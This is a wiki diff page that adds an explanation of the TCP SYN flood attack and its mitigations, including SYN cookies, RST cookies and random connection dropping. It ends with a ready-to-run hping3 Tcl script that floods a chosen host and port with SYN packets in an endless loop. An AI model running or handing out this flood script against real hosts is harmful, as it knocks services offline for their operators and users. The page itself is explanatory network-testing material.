Differences for page SYN floodCurrent version compared with version Sun Sep 12 18:20:10 GMT 2004- todo+ !!The SYN flood is an attack that can nowadays be defined as archaic, although the general idea can still work (in a DDoS, for instance).
+
+
+ The goal of this attack is to send TCP connection requests faster than a machine can process them
+ in order to saturate the resources and prevent the machine from accepting any more connections.
+ Actually the attacker does not create a whole TCP connection, but just send a SYN packet
+ (the first packet required to start a TCP connetion), spoofing at random the source IP address,
+ so from the attacker point of view the resource to perform the attack is only the bandwidth
+ because there is no state to take. Modern operating systems are able to handle resources better
+ than in the past, or to use cryptographic techniques (like [Syn cookies] or [RST cookies]) to mitigate
+ the problem (and allocate memory only after the third packet of a new TCP connection reached the host),
+ but still the attack can create some problem. A simpler way to face it, that is somewhat effective and
+ yet very simple, is to drop a connection at random if there are too many open connections.
+
+ ----
+
+
+ This wiki is nothing without code, so here we go (as .htcl file).....
+
+ # (c) GPL2 fluxist(at)gmail.com
+ # Usage; hping3 exec ./synflood.htcl <hostname> <dstport>
+
+ if {$argc < 2} {
+ puts "Required arguments: hostname dstport"
+ exit 1
+ }
+
+ foreach {hostname port} $argv break
+ set srcport 14000
+ set target [hping resolve $hostname]
+ set myaddr [hping outifa $target]
+
+ puts "Synflooding $target..."
+
+ while {1} {
+ hping send "ip(saddr=$myaddr,daddr=$target)+tcp(sport=$srcport,dport=$port,flags=s)"
+ } The following is the old page content
|